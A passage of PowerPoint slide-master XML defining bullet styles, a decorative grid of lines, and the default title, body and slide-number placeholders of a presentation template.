      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="hlink"/>
        </a:buClr>
        <a:buSzPct val="95000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="w"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="1600200" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="tx1"/>
        </a:buClr>
        <a:buSzPct val="65000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2000">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="20574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a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="-76200"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 3"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="192"/>
                <a:ext cx="5760" cy="4032"/>
                <a:chOff x="0" y="192"/>
                <a:chExt cx="5760" cy="4032"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068037" name="Line 5"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="19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38" name="Line 6"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="38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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="57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40" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="76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41" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="96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42" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="115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43" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="134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44" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="153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45" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="172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46" name="Line 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="192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47" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="211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48" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="230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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="249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50" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="268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51" name="Line 19"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="288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52" name="Line 20"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="307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53" name="Line 21"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="326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54" name="Line 22"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="345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55" name="Line 23"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="364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56" name="Line 24"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="384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57" name="Line 25"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="403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58" name="Line 26"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="422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grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 27"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="192" y="0"/>
                <a:ext cx="5376" cy="4320"/>
                <a:chOff x="192" y="0"/>
                <a:chExt cx="5376" cy="4320"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068060" name="Line 28"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="1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61" name="Line 29"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="3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62" name="Line 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="5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63" name="Line 31"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="7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64" name="Line 32"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="96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65" name="Line 33"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="115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66" name="Line 34"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="134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67" name="Line 35"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="153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68" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="172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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="192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70" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="211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71" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="230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72" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="249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73" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="268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74" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="288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75" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="307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76" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="326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77" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="345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78" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="364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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="384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80" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="403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81" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="422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82" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="441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83" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="460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84" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="480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85" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="49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86" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="51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87" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="53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88" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="55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grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="2112" y="0"/>
              <a:ext cx="3648" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct60">
              <a:fgClr>
                <a:schemeClr val="folHlink"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="bg1"/>
              </a:bgClr>
            </a:pattFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="5568" y="0"/>
              <a:ext cx="0" cy="1488"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="261" y="892"/>
              <a:ext cx="1124" cy="1464"/>
              <a:chOff x="96" y="916"/>
              <a:chExt cx="2208" cy="2876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="96" y="1038"/>
                <a:ext cx="2208" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="336" y="920"/>
                <a:ext cx="0" cy="2872"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="218" y="916"/>
                <a:ext cx="238" cy="240"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="838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GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4100" name="Rectangle 64" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="1524000"/>
            <a:ext cx="80010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68100" name="Rectangle 68"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000"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a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AA4876DF-757E-41D8-A7F8-C5ABB827746C}"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hf sldNum="0"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hlink"/>
        </a:buClr>
        <a:buSzPct val="110000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId13"/>
        </a:buBlip>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itchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="hlink"/>
        </a:buClr>
        <a:buSzPct val="95000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="w"/>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6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a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6858000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5760" cy="4320"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 3"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5760" cy="4320"/>
              <a:chOff x="0" y="0"/>
              <a:chExt cx="5760" cy="4320"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4" name="Group 4"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="0" y="192"/>
                <a:ext cx="5760" cy="4032"/>
                <a:chOff x="0" y="192"/>
                <a:chExt cx="5760" cy="4032"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="1068037" name="Line 5"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="19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38" name="Line 6"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="38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39" name="Line 7"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="57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40" name="Line 8"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="76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41" name="Line 9"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="96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42" name="Line 10"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="115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43" name="Line 11"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="134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44" name="Line 12"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="153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45" name="Line 13"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="172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46" name="Line 14"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="192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47" name="Line 15"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="211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48" name="Line 16"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="230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49" name="Line 17"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="249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50" name="Line 18"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="0" y="268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51" name="Line 19"/>
                <p:cNvSpPr>
